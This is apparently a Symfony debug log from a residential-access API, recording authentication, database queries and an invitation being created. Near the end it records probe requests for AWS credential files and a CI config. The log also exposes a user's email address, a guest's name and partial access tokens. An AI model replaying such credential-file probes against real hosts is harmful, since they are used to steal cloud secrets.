[2025-12-20 19:30:08] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [398] []
[2025-12-20 19:30:08] security.INFO: Guard authentication successful! {"token":"[object] (Symfony\\Component\\Security\\Guard\\Token\\PostAuthenticationGuardToken: PostAuthenticationGuardToken(user=\"carlosyadri25@gmail.com\", authenticated=true, roles=\"ROLE_USER\"))","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-20 19:30:08] security.DEBUG: Guard authenticator set no success response: request continues. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-20 19:30:08] security.DEBUG: Remember me skipped: it is not configured for the firewall. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-20 19:30:08] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.street AS street_7, t0.outdoor_number AS outdoor_number_8, t0.interior_number AS interior_number_9, t0.residential_id AS residential_id_10 FROM address t0 WHERE t0.uuid = ? LIMIT 1 ["c95c459d-212c-4555-98e9-59 [...]"] []
[2025-12-20 19:30:08] doctrine.DEBUG: SELECT t0.status AS status_1, t0.date_created AS date_created_2, t0.date_modified AS date_modified_3, t0.user_id AS user_id_4, t0.address_id AS address_id_5, t0.parent_id AS parent_id_6, t0.permission AS permission_7, t0.color AS color_8, t0.rent AS rent_9 FROM user_has_address t0 WHERE t0.user_id = ? AND t0.address_id = ? AND t0.status = ? [398,274,1] []
[2025-12-20 19:30:08] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.street AS street_7, t0.outdoor_number AS outdoor_number_8, t0.interior_number AS interior_number_9, t0.residential_id AS residential_id_10 FROM address t0 WHERE t0.uuid = ? LIMIT 1 ["c95c459d-212c-4555-98e9-59 [...]"] []
[2025-12-20 19:30:08] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.id_rule AS id_rule_7, t0.plate_rule AS plate_rule_8, t0.cp AS cp_9, t0.neighborhood AS neighborhood_10, t0.country AS country_11, t0.state AS state_12, t0.city AS city_13 FROM residential t0 WHERE t0.id = ? LIMIT 1 [15] []
[2025-12-20 19:30:08] doctrine.DEBUG: SELECT i0_.id AS id_0, i0_.uuid AS uuid_1, i0_.status AS status_2, i0_.date_created AS date_created_3, i0_.date_modified AS date_modified_4, i0_.name AS name_5, i0_.last_name AS last_name_6, i0_.code AS code_7, i0_.image_code_path AS image_code_path_8, i0_.type AS type_9, i0_.subtype AS subtype_10, i0_.date_invitation AS date_invitation_11, i0_.date_start AS date_start_12, i0_.date_end AS date_end_13, i0_.event_id AS event_id_14, i0_.address_id AS address_id_15, i0_.user_id AS user_id_16 FROM invitation i0_ WHERE (i0_.address_id = ?) AND (i0_.status = ?) ORDER BY i0_.date_invitation DESC LIMIT 10 OFFSET 0 [274,1] []
[2025-12-20 19:30:08] doctrine.DEBUG: SELECT count(i0_.id) AS sclr_0 FROM invitation i0_ WHERE (i0_.address_id = ?) AND (i0_.status = ?) [274,1] []
[2025-12-20 19:30:08] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [398] []
[2025-12-20 19:30:08] security.DEBUG: Stored the security token in the session. {"key":"_security_bearer_presence"} []
[2025-12-20 19:30:08] security.DEBUG: Stored the security token in the session. {"key":"_security_bearer_presence"} []
[2025-12-20 19:30:13] request.INFO: Matched route "residential_get_uuid_providers". {"route":"residential_get_uuid_providers","route_parameters":{"_controller":"Hona\\ApiBundle\\Controller\\ResidentialController::residentialProvidersGETAction","domain":"api.unda.co","uuid":"c95c459d-212c-4555-98e9-59cee00445e5","_route":"residential_get_uuid_providers"},"request_uri":"https://api.unda.co/residential/c95c459d-212c-4555-98e9-59cee00445e5/providers","method":"GET"} []
[2025-12-20 19:30:13] security.DEBUG: Read existing security token from the session. {"key":"_security_bearer_presence","token_class":"Symfony\\Component\\Security\\Guard\\Token\\PostAuthenticationGuardToken"} []
[2025-12-20 19:30:13] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM access_token t0 WHERE t0.token = ? LIMIT 1 ["44b5b9e6a8d88fdffe816d2232 [...]"] []
[2025-12-20 19:30:13] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [398] []
[2025-12-20 19:30:13] security.DEBUG: Cannot refresh token because user has changed. {"username":"carlosyadri25@gmail.com","provider":"Hona\\ApiBundle\\Security\\ApiUserProvider"} []
[2025-12-20 19:30:13] security.DEBUG: Token was deauthenticated after trying to refresh it. [] []
[2025-12-20 19:30:13] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
[2025-12-20 19:30:13] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-20 19:30:13] security.DEBUG: Calling getCredentials() on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-20 19:30:13] security.DEBUG: Passing guard token information to the GuardAuthenticationProvider {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-20 19:30:13] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM access_token t0 WHERE t0.token = ? LIMIT 1 ["44b5b9e6a8d88fdffe816d2232 [...]"] []
[2025-12-20 19:30:13] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [398] []
[2025-12-20 19:30:13] security.INFO: Guard authentication successful! {"token":"[object] (Symfony\\Component\\Security\\Guard\\Token\\PostAuthenticationGuardToken: PostAuthenticationGuardToken(user=\"carlosyadri25@gmail.com\", authenticated=true, roles=\"ROLE_USER\"))","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-20 19:30:13] security.DEBUG: Guard authenticator set no success response: request continues. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-20 19:30:13] security.DEBUG: Remember me skipped: it is not configured for the firewall. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-20 19:30:13] security.DEBUG: Stored the security token in the session. {"key":"_security_bearer_presence"} []
[2025-12-20 19:30:43] request.INFO: Matched route "invitation_create". {"route":"invitation_create","route_parameters":{"_controller":"Hona\\ApiBundle\\Controller\\InvitationController::invitationCreateAction","domain":"api.unda.co","_route":"invitation_create"},"request_uri":"https://api.unda.co/invitation/create","method":"POST"} []
[2025-12-20 19:30:43] security.DEBUG: Read existing security token from the session. {"key":"_security_bearer_presence","token_class":"Symfony\\Component\\Security\\Guard\\Token\\PostAuthenticationGuardToken"} []
[2025-12-20 19:30:43] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM access_token t0 WHERE t0.token = ? LIMIT 1 ["44b5b9e6a8d88fdffe816d2232 [...]"] []
[2025-12-20 19:30:43] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [398] []
[2025-12-20 19:30:43] security.DEBUG: Cannot refresh token because user has changed. {"username":"carlosyadri25@gmail.com","provider":"Hona\\ApiBundle\\Security\\ApiUserProvider"} []
[2025-12-20 19:30:43] security.DEBUG: Token was deauthenticated after trying to refresh it. [] []
[2025-12-20 19:30:43] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
[2025-12-20 19:30:43] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-20 19:30:43] security.DEBUG: Calling getCredentials() on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-20 19:30:43] security.DEBUG: Passing guard token information to the GuardAuthenticationProvider {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-20 19:30:43] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM access_token t0 WHERE t0.token = ? LIMIT 1 ["44b5b9e6a8d88fdffe816d2232 [...]"] []
[2025-12-20 19:30:43] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [398] []
[2025-12-20 19:30:43] security.INFO: Guard authentication successful! {"token":"[object] (Symfony\\Component\\Security\\Guard\\Token\\PostAuthenticationGuardToken: PostAuthenticationGuardToken(user=\"carlosyadri25@gmail.com\", authenticated=true, roles=\"ROLE_USER\"))","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-20 19:30:43] security.DEBUG: Guard authenticator set no success response: request continues. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-20 19:30:43] security.DEBUG: Remember me skipped: it is not configured for the firewall. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-20 19:30:43] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.street AS street_7, t0.outdoor_number AS outdoor_number_8, t0.interior_number AS interior_number_9, t0.residential_id AS residential_id_10 FROM address t0 WHERE t0.uuid = ? LIMIT 1 ["c95c459d-212c-4555-98e9-59 [...]"] []
[2025-12-20 19:30:43] doctrine.DEBUG: SELECT t0.status AS status_1, t0.date_created AS date_created_2, t0.date_modified AS date_modified_3, t0.user_id AS user_id_4, t0.address_id AS address_id_5, t0.parent_id AS parent_id_6, t0.permission AS permission_7, t0.color AS color_8, t0.rent AS rent_9 FROM user_has_address t0 WHERE t0.user_id = ? AND t0.address_id = ? AND t0.status = ? [398,274,1] []
[2025-12-20 19:30:43] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.uuid = ? LIMIT 1 ["914a4df2-219f-4106-974f-ce [...]"] []
[2025-12-20 19:30:43] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.street AS street_7, t0.outdoor_number AS outdoor_number_8, t0.interior_number AS interior_number_9, t0.residential_id AS residential_id_10 FROM address t0 WHERE t0.uuid = ? LIMIT 1 ["c95c459d-212c-4555-98e9-59 [...]"] []
[2025-12-20 19:30:43] doctrine.DEBUG: SELECT a0_.id AS id_0, a0_.uuid AS uuid_1, a0_.status AS status_2, a0_.date_created AS date_created_3, a0_.date_modified AS date_modified_4, a0_.name AS name_5, a0_.street AS street_6, a0_.outdoor_number AS outdoor_number_7, a0_.interior_number AS interior_number_8, a0_.residential_id AS residential_id_9 FROM address a0_ INNER JOIN user_has_address u1_ ON ((u1_.address_id = a0_.id) AND (u1_.user_id = ?)) WHERE (a0_.id = ?) AND (a0_.status = ?) LIMIT 1 [398,274,1] []
[2025-12-20 19:30:43] doctrine.DEBUG: "START TRANSACTION" [] []
[2025-12-20 19:30:43] doctrine.DEBUG: INSERT INTO invitation (uuid, status, date_created, date_modified, name, last_name, code, image_code_path, type, subtype, date_invitation, date_start, date_end, event_id, address_id, user_id) VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?) {"1":"69824b80-888f-475b-885d-19 [...]","2":1,"3":"2025-12-20 19:30:43","4":"2025-12-20 19:30:43","5":"Jose ElÃas","6":"Nahuat","7":"680207","8":"/invitation/629fa8880a65b9 [...]","9":"1","10":null,"11":"2025-12-20 19:30:00","12":null,"13":null,"14":null,"15":274,"16":398} []
[2025-12-20 19:30:43] doctrine.DEBUG: "COMMIT" [] []
[2025-12-20 19:30:43] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [398] []
[2025-12-20 19:30:43] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.street AS street_7, t0.outdoor_number AS outdoor_number_8, t0.interior_number AS interior_number_9, t0.residential_id AS residential_id_10 FROM address t0 WHERE t0.id = ? LIMIT 1 [274] []
[2025-12-20 19:30:43] security.DEBUG: Stored the security token in the session. {"key":"_security_bearer_presence"} []
[2025-12-20 19:30:43] request.INFO: Matched route "address_get_uuid_invitation". {"route":"address_get_uuid_invitation","route_parameters":{"size":"20","page":"0","_controller":"Hona\\ApiBundle\\Controller\\AddressController::addressInvitationGETAction","domain":"api.unda.co","uuid":"c95c459d-212c-4555-98e9-59cee00445e5","_route":"address_get_uuid_invitation"},"request_uri":"https://api.unda.co/address/c95c459d-212c-4555-98e9-59cee00445e5/invitation/20/0?order=desc","method":"GET"} []
[2025-12-20 19:30:43] security.DEBUG: Read existing security token from the session. {"key":"_security_bearer_presence","token_class":"Symfony\\Component\\Security\\Guard\\Token\\PostAuthenticationGuardToken"} []
[2025-12-20 19:30:43] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM access_token t0 WHERE t0.token = ? LIMIT 1 ["44b5b9e6a8d88fdffe816d2232 [...]"] []
[2025-12-20 19:30:43] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [398] []
[2025-12-20 19:30:43] security.DEBUG: Cannot refresh token because user has changed. {"username":"carlosyadri25@gmail.com","provider":"Hona\\ApiBundle\\Security\\ApiUserProvider"} []
[2025-12-20 19:30:43] security.DEBUG: Token was deauthenticated after trying to refresh it. [] []
[2025-12-20 19:30:43] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
[2025-12-20 19:30:43] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-20 19:30:43] security.DEBUG: Calling getCredentials() on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-20 19:30:43] security.DEBUG: Passing guard token information to the GuardAuthenticationProvider {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-20 19:30:43] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM access_token t0 WHERE t0.token = ? LIMIT 1 ["44b5b9e6a8d88fdffe816d2232 [...]"] []
[2025-12-20 19:30:43] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [398] []
[2025-12-20 19:30:43] security.INFO: Guard authentication successful! {"token":"[object] (Symfony\\Component\\Security\\Guard\\Token\\PostAuthenticationGuardToken: PostAuthenticationGuardToken(user=\"carlosyadri25@gmail.com\", authenticated=true, roles=\"ROLE_USER\"))","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-20 19:30:43] security.DEBUG: Guard authenticator set no success response: request continues. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-20 19:30:43] security.DEBUG: Remember me skipped: it is not configured for the firewall. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-20 19:30:43] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.street AS street_7, t0.outdoor_number AS outdoor_number_8, t0.interior_number AS interior_number_9, t0.residential_id AS residential_id_10 FROM address t0 WHERE t0.uuid = ? LIMIT 1 ["c95c459d-212c-4555-98e9-59 [...]"] []
[2025-12-20 19:30:43] doctrine.DEBUG: SELECT t0.status AS status_1, t0.date_created AS date_created_2, t0.date_modified AS date_modified_3, t0.user_id AS user_id_4, t0.address_id AS address_id_5, t0.parent_id AS parent_id_6, t0.permission AS permission_7, t0.color AS color_8, t0.rent AS rent_9 FROM user_has_address t0 WHERE t0.user_id = ? AND t0.address_id = ? AND t0.status = ? [398,274,1] []
[2025-12-20 19:30:43] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.street AS street_7, t0.outdoor_number AS outdoor_number_8, t0.interior_number AS interior_number_9, t0.residential_id AS residential_id_10 FROM address t0 WHERE t0.uuid = ? LIMIT 1 ["c95c459d-212c-4555-98e9-59 [...]"] []
[2025-12-20 19:30:43] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.id_rule AS id_rule_7, t0.plate_rule AS plate_rule_8, t0.cp AS cp_9, t0.neighborhood AS neighborhood_10, t0.country AS country_11, t0.state AS state_12, t0.city AS city_13 FROM residential t0 WHERE t0.id = ? LIMIT 1 [15] []
[2025-12-20 19:30:43] doctrine.DEBUG: SELECT i0_.id AS id_0, i0_.uuid AS uuid_1, i0_.status AS status_2, i0_.date_created AS date_created_3, i0_.date_modified AS date_modified_4, i0_.name AS name_5, i0_.last_name AS last_name_6, i0_.code AS code_7, i0_.image_code_path AS image_code_path_8, i0_.type AS type_9, i0_.subtype AS subtype_10, i0_.date_invitation AS date_invitation_11, i0_.date_start AS date_start_12, i0_.date_end AS date_end_13, i0_.event_id AS event_id_14, i0_.address_id AS address_id_15, i0_.user_id AS user_id_16 FROM invitation i0_ WHERE (i0_.address_id = ?) AND (i0_.status = ?) ORDER BY i0_.date_invitation DESC LIMIT 20 OFFSET 0 [274,1] []
[2025-12-20 19:30:43] doctrine.DEBUG: SELECT count(i0_.id) AS sclr_0 FROM invitation i0_ WHERE (i0_.address_id = ?) AND (i0_.status = ?) [274,1] []
[2025-12-20 19:30:43] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [398] []
[2025-12-20 19:30:43] security.DEBUG: Stored the security token in the session. {"key":"_security_bearer_presence"} []
[2025-12-20 19:33:49] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"b03665","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/b03665?panel=validator","method":"GET"} []
[2025-12-20 19:33:49] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=validator","method":"GET"} []
[2025-12-20 19:41:54] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"a26a5e","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/a26a5e?panel=security","method":"GET"} []
[2025-12-20 19:41:54] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=security","method":"GET"} []
[2025-12-20 19:42:31] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"e71d17","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/e71d17?panel=cache","method":"GET"} []
[2025-12-20 19:42:31] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=cache","method":"GET"} []
[2025-12-20 19:45:00] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"8e8b4b","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/8e8b4b","method":"GET"} []
[2025-12-20 19:45:00] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar","method":"GET"} []
[2025-12-20 19:53:10] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"993d28","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/993d28?panel=time","method":"GET"} []
[2025-12-20 19:53:10] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=time","method":"GET"} []
[2025-12-20 19:54:50] request.INFO: Matched route "home". {"route":"home","route_parameters":{"_controller":"Hona\\AuthBundle\\Controller\\HomeController::indexAction","domain":"auth.unda.co","_route":"home"},"request_uri":"https://auth.unda.co/","method":"GET"} []
[2025-12-20 19:54:51] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /.aws-secrets"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /.aws-secrets\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 19:54:55] request.INFO: Matched route "home". {"route":"home","route_parameters":{"_controller":"Hona\\AuthBundle\\Controller\\HomeController::indexAction","domain":"auth.unda.co","_route":"home"},"request_uri":"https://auth.unda.co/","method":"GET"} []
[2025-12-20 19:54:56] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /.aws/config"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /.aws/config\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 19:54:57] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /.aws/credentials"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /.aws/credentials\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 19:54:58] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /.cirrus.yml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /.cirrus.yml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
